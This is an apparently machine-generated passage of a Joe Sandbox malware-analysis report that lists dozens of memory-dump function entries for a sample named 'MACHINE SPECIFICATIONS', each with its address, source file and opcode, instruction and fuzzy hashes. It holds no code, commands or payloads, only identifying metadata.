                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1f441a4e76ccad4f9370ccc7daabf5c6e841216cd6e755a97d4ad06b9c63af25
                                                                                    • Instruction ID: ef5163992f93665a316810c55a21864c902e6cda748320a8cbf7ff2fd00f64a4
                                                                                    • Opcode Fuzzy Hash: 1f441a4e76ccad4f9370ccc7daabf5c6e841216cd6e755a97d4ad06b9c63af25
                                                                                    • Instruction Fuzzy Hash: 4211F275201304CFE725DF26D845A56BBA6FF85361B008469EC4A8B290CB72EC40CF60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 05809999 Relevance: .0, Instructions: 50COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 23107edfb55e5e0d5a6f5b421ec6028f463ce451a5775146ed8dbab547f20aa5
                                                                                    • Instruction ID: a205a1429ed210bc5a090ba211aaab145b126d538d44c76932587888cd7124f8
                                                                                    • Opcode Fuzzy Hash: 23107edfb55e5e0d5a6f5b421ec6028f463ce451a5775146ed8dbab547f20aa5
                                                                                    • Instruction Fuzzy Hash: 10015E79714214AFD7049B59E885B7E7BEAEB88760F04801AFE0AC7350EF70AC058F91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 058099A8 Relevance: .0, Instructions: 46COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ca1063a2b2a1d47f9ec5996b1a52ed56b1f914e8c6004683dff3e3e0680169bf
                                                                                    • Instruction ID: cdbcbdc8bf911ea46b31d7a2ff75a47aea74a86000988ba47e8fa499ea95bb8c
                                                                                    • Opcode Fuzzy Hash: ca1063a2b2a1d47f9ec5996b1a52ed56b1f914e8c6004683dff3e3e0680169bf
                                                                                    • Instruction Fuzzy Hash: 1401A279304114AFD7049B59D885A3E7BEEEB88760F04801AFE0AC7340DF70AC058B91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0580BE71 Relevance: .0, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 151ea07d8324797c0f5354a618bfb1e35822f4dbfb1d58a6588d666bf1fa6783
                                                                                    • Instruction ID: 8a034ed32ef5ff5e5a2ba9636cc7141bd1e5de9663f8546f0aee823f1101fc8e
                                                                                    • Opcode Fuzzy Hash: 151ea07d8324797c0f5354a618bfb1e35822f4dbfb1d58a6588d666bf1fa6783
                                                                                    • Instruction Fuzzy Hash: C701D4397009118FC7118B18D88496EFBEBEFC4211B19805AED0ACB355CF749C42CF91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0146DAF5 Relevance: .0, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.364862414.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_146d000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6cd8930eb8bac8144222d760da785cdb6071a2343c0698650aa180454a0281b4
                                                                                    • Instruction ID: 67c681a5cca87bbb1d9541cc6d7a9d62d3c9370ebe84d95cde66c7cde62ea82b
                                                                                    • Opcode Fuzzy Hash: 6cd8930eb8bac8144222d760da785cdb6071a2343c0698650aa180454a0281b4
                                                                                    • Instruction Fuzzy Hash: 7C01D471A083889AE7104E59CC84B67BFDCDB45A2CF18805BEA445B25AD3799844C676
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0580AB28 Relevance: .0, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0e31616058dec203ee93d26cf7e821bdc361c79c2a8be24dba4cead5bb85cdc0
                                                                                    • Instruction ID: b88aeedfb9d7c70bd2f7ef4673bda0d6f1375ddf97a9942f896ccdad706aebaf
                                                                                    • Opcode Fuzzy Hash: 0e31616058dec203ee93d26cf7e821bdc361c79c2a8be24dba4cead5bb85cdc0
                                                                                    • Instruction Fuzzy Hash: 4B01CC356083458FDB59EB70C864469BBFAEF42214B1980AAD806C7241EF359D06CB52
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 05803EB0 Relevance: .0, Instructions: 43COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6da30efc9da932b91fa356db4362515f9a609c02c07769bb674e62ec24d01742
                                                                                    • Instruction ID: 8fa9269c07147566977e051a340a1f52200fcf5927df17af4149f9777b0807de
                                                                                    • Opcode Fuzzy Hash: 6da30efc9da932b91fa356db4362515f9a609c02c07769bb674e62ec24d01742
                                                                                    • Instruction Fuzzy Hash: 7F01D1317002049BCB24DF65E849B7E7BBBEBC1665F45992CF90AD7280EF319806DB51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0580FDC7 Relevance: .0, Instructions: 42COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6f259056dfc765c0ddd78a52e47b4a6d6a159ce052094157a99c5e261a1929c1
                                                                                    • Instruction ID: 987fb61968966213be42af76d4f4a5bb6cfe2901d3993de1265a1f37db339bf8
                                                                                    • Opcode Fuzzy Hash: 6f259056dfc765c0ddd78a52e47b4a6d6a159ce052094157a99c5e261a1929c1
                                                                                    • Instruction Fuzzy Hash: 2B11E875A0010ACFDB24DF65ED58AAE77B2BF48745F50A018E902FB295CB74AC14CF60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0580CADF Relevance: .0, Instructions: 41COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 37936bed9489a23f6b05c096c767867c98765f9e1869eb91027739287c1505ef
                                                                                    • Instruction ID: 89474ed4410b0112460746498fa90e1f2db231657b71df6dc7a3a04252bd6ea9
                                                                                    • Opcode Fuzzy Hash: 37936bed9489a23f6b05c096c767867c98765f9e1869eb91027739287c1505ef
                                                                                    • Instruction Fuzzy Hash: 25014B75E10118AFCB019FA99C05AFEBBBAEBC8211F048066ED18E2140EB305915CFA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 05803EC0 Relevance: .0, Instructions: 40COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4083078127a6e0d5c881c4b1674eec7713decb4398a4ca24f13f1fdc24790899
                                                                                    • Instruction ID: d13fad457fc242ef3144c143a3fbb47111c05e1b3471585f3883e9061c2a40e2
                                                                                    • Opcode Fuzzy Hash: 4083078127a6e0d5c881c4b1674eec7713decb4398a4ca24f13f1fdc24790899
                                                                                    • Instruction Fuzzy Hash: 36F0AF317002059BCB24DF65A849A7E7BBBEBC1665B04982CF90AD73C0EF71A8069751
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 05803F40 Relevance: .0, Instructions: 38COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3fadb967230a56b1696f04bbde9a768ad3063ee9ebd7396e33070308381cb17f
                                                                                    • Instruction ID: a848fe4bd3b1cde64540607cf8c56e735e8591b42519ded8eef80b0f60cc9633
                                                                                    • Opcode Fuzzy Hash: 3fadb967230a56b1696f04bbde9a768ad3063ee9ebd7396e33070308381cb17f
                                                                                    • Instruction Fuzzy Hash: B7F0B4717083149BE364B760AC55BB9376EFB84754F01542EAA07CB2C0CE658C00C795
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0580C8D0 Relevance: .0, Instructions: 36COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f42d333b1018d01829e2fb40b2fa6b159059c4282455f55f84f87dc10395c4b4
                                                                                    • Instruction ID: 5500bf60ffe2eb2b194aaf91842a2ab5a8ea86c2b51d1e89f62e1ebff6a3be06
                                                                                    • Opcode Fuzzy Hash: f42d333b1018d01829e2fb40b2fa6b159059c4282455f55f84f87dc10395c4b4
                                                                                    • Instruction Fuzzy Hash: 7DF05E36300118ABC7109A5AE88489EBB9EFBC9271B508022FD09C7300CB30AC01CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0146DAF4 Relevance: .0, Instructions: 36COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.364862414.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_146d000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d9bd64200f7c2cb2371897cf4ddcf6cf97c32fb3967e2b5fd9c7c608459752de
                                                                                    • Instruction ID: 217c376ccf4af838f6f2dcf268c4e6546d1e30efed00a389811cb4fd9f420260
                                                                                    • Opcode Fuzzy Hash: d9bd64200f7c2cb2371897cf4ddcf6cf97c32fb3967e2b5fd9c7c608459752de
                                                                                    • Instruction Fuzzy Hash: F1F0C2729042849BEB118E09CCC4B63FF9CEB81738F18C05BED485B386C3789844CAB1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0580CAF0 Relevance: .0, Instructions: 35COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c43bd2a33cbbb3023814f0c70ee2e0d2fa3a82a0a202fc7f8727083b2480e643
                                                                                    • Instruction ID: 9e90d4f3a8cf1be1afe7ee717852217164a4963ad7459a9c7cd2628d47e773fe
                                                                                    • Opcode Fuzzy Hash: c43bd2a33cbbb3023814f0c70ee2e0d2fa3a82a0a202fc7f8727083b2480e643
                                                                                    • Instruction Fuzzy Hash: 4EF01D76E10118AFCB05DF999C05AFEBBFAEFC8611F048066EA19E3240DB745A15CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0580FF78 Relevance: .0, Instructions: 34COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 826876f008a75c34b7a6650341634b997e29d91efc633c321e59486ff4ae5cba
                                                                                    • Instruction ID: c06b968b0d6aaf27c6bf73fb14747680219ffd3ce27d0597af7fb3c44b13902b
                                                                                    • Opcode Fuzzy Hash: 826876f008a75c34b7a6650341634b997e29d91efc633c321e59486ff4ae5cba
                                                                                    • Instruction Fuzzy Hash: 94F08232A082988FDB15EBA8E8458CD7FB4DF07211B01929BD5459F152EA20AE59CBD2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0580C6C0 Relevance: .0, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cd78f73fc6fded49780bf2ce43f6810652cd79f3614ea1cb5d8d81851e658e6e
                                                                                    • Instruction ID: 3a9e196c6cc40ab1fd2243304ee74b485c48bf8ccfa7a403e87e41b657ab4e4e
                                                                                    • Opcode Fuzzy Hash: cd78f73fc6fded49780bf2ce43f6810652cd79f3614ea1cb5d8d81851e658e6e
                                                                                    • Instruction Fuzzy Hash: 15F027B67052455F87118AACA84057B7BE9FB88124304442EEC49C3241DB305C098B50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 058070F3 Relevance: .0, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a60639d022f48071c968ff12869a779081ad1a6bfae398111ff3b23a0fed12bf
                                                                                    • Instruction ID: 599f326ab1d3a7fe0a4470bec3b7981477272dc5ada7db05321a9484fa45a0f9
                                                                                    • Opcode Fuzzy Hash: a60639d022f48071c968ff12869a779081ad1a6bfae398111ff3b23a0fed12bf
                                                                                    • Instruction Fuzzy Hash: 4AF0F935201705CFD728AB52D844A56B766FF85326F14882DD85B97790CB31F882CB80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0580CB48 Relevance: .0, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 548276b20c7787e02015855fc5e3956a803e723e91c2f177b092755bb144e6fd
                                                                                    • Instruction ID: eadcb3f0d586c5e51070395eb17d5be5ae2e0f4b75c354b7ad673f26a10f72ef
                                                                                    • Opcode Fuzzy Hash: 548276b20c7787e02015855fc5e3956a803e723e91c2f177b092755bb144e6fd
                                                                                    • Instruction Fuzzy Hash: 88F017342013049FE755EF66D806B66BBAAFF85351B008479FC0ACA290DB32EC01CF60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 05805DE1 Relevance: .0, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 963b1b965ba9b00dfb344a9b0bc210e9424a17b85556ffe8d9790010a5c1f6f1
                                                                                    • Instruction ID: 5b3a22d0721228aa0720e37f8429c8b0f77121cc90d5fedc07bdc5f7b5a800a5
                                                                                    • Opcode Fuzzy Hash: 963b1b965ba9b00dfb344a9b0bc210e9424a17b85556ffe8d9790010a5c1f6f1
                                                                                    • Instruction Fuzzy Hash: BBE0E5312042044FCB64AF15E84DB8A3BA8EF45214F041419F80BC62A0EF60FC40CE94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 05808600 Relevance: .0, Instructions: 20COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 67d49e9c4a5d688867858589de2d5cbf093a612380c708f776b0fa6a66c3ac6a
                                                                                    • Instruction ID: 57bfb14a0e677eb5439892cafd6f8519b04484b28caa99441ad931b647733a05
                                                                                    • Opcode Fuzzy Hash: 67d49e9c4a5d688867858589de2d5cbf093a612380c708f776b0fa6a66c3ac6a
                                                                                    • Instruction Fuzzy Hash: A4D0CA227406281A2A8061FA2C056BB62CE89800A570954B2EE0CC2682E969CC9126EA
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0580FF88 Relevance: .0, Instructions: 20COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 28ffff29c8896643e930a6017f6e7eb17925a19f18f8ec4879fba4e8489c3bda
                                                                                    • Instruction ID: 966793debe66a6e21c1a27a3018cdd30ac4c221f67685ae8b576a0418788e442
                                                                                    • Opcode Fuzzy Hash: 28ffff29c8896643e930a6017f6e7eb17925a19f18f8ec4879fba4e8489c3bda
                                                                                    • Instruction Fuzzy Hash: 6CE08631E10519DFCB04FBA8E5488CCBB78EF45211F014296D5096B220FB70AA58CBD1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 05805F73 Relevance: .0, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9c9c8712b6a6810d9c94229daa2bf66d9661af770a23c865fac1382079f83788
                                                                                    • Instruction ID: 2fd252f76c7d729229baac5fe0136989424cf6bd70e0aef43441b576fb92a1b8
                                                                                    • Opcode Fuzzy Hash: 9c9c8712b6a6810d9c94229daa2bf66d9661af770a23c865fac1382079f83788
                                                                                    • Instruction Fuzzy Hash: D1E0C231504254CBEB646B69E90A7A6BB70FF01225F0894ADE88E8AAC0C6346D11CF81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 05804A78 Relevance: .0, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2b409c23eed226ab2b78b6040c88cd137110ee5ecb4adb1dc13f6066e6ae87b9
                                                                                    • Instruction ID: 44dc4763ff4e7e556922966b0cd528c090d3220bf90a0a5cd0ecce701207c1a2
                                                                                    • Opcode Fuzzy Hash: 2b409c23eed226ab2b78b6040c88cd137110ee5ecb4adb1dc13f6066e6ae87b9
                                                                                    • Instruction Fuzzy Hash: 02E012353502108FD704AB55E448B9577B9FB49B25F11C15AE60587765DBB19C068B80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 05808E60 Relevance: .0, Instructions: 16COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c8773b35cca934de6e824c9fad9575a194a4d17cee99595845e4addc81526e8e
                                                                                    • Instruction ID: b30415c20319cf3d8b446bd51f609ea4fdee9f98569267532957d8d157639017
                                                                                    • Opcode Fuzzy Hash: c8773b35cca934de6e824c9fad9575a194a4d17cee99595845e4addc81526e8e
                                                                                    • Instruction Fuzzy Hash: E0D017357011209BD340AB5CF08639933A2BB89655F65816AD806C3318EB3498198386
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 05804A88 Relevance: .0, Instructions: 16COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1c1cffac827aafb42e41e0c3998a5e65d7ded76be0a07ff0af3ade142ef591e8
                                                                                    • Instruction ID: f40c307c8b272c0ecb92880afbfe6eb7222342ab189140f305c2fc8227e4cc1d
                                                                                    • Opcode Fuzzy Hash: 1c1cffac827aafb42e41e0c3998a5e65d7ded76be0a07ff0af3ade142ef591e8
                                                                                    • Instruction Fuzzy Hash: 60D0A7343401108FC200AB18E448D9677EDEB49721F014096F905C7360CAB1EC0087C0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 058040D3 Relevance: .0, Instructions: 14COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 802f4a0b601c55f1c847efebe8ebf4523f5adb21517cd6ebc2c72147ae2300a9
                                                                                    • Instruction ID: 24c135bd76d9f9fc584bf9d41fd011be05903d2f890eb2bc125f8d732c4eb1c7
                                                                                    • Opcode Fuzzy Hash: 802f4a0b601c55f1c847efebe8ebf4523f5adb21517cd6ebc2c72147ae2300a9
                                                                                    • Instruction Fuzzy Hash: 37D0A9A06002088BDFF0D6784C113321363FB9902CF82B1389F11CA2F0EE188C019B21
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 05803910 Relevance: .0, Instructions: 8COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b8acfcaa03042fc8179eb885bfe120a13eba5cf05f110ddfa5c4b21157dbd34d
                                                                                    • Instruction ID: d7fd16443c902ee2e248a8390875b03867046109ee8e61f3384f8ed455b6b534
                                                                                    • Opcode Fuzzy Hash: b8acfcaa03042fc8179eb885bfe120a13eba5cf05f110ddfa5c4b21157dbd34d
                                                                                    • Instruction Fuzzy Hash: 7DB092AA9496408FCB469B266C702C02B61AB32201B8883969802C2295B51D8E054620
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%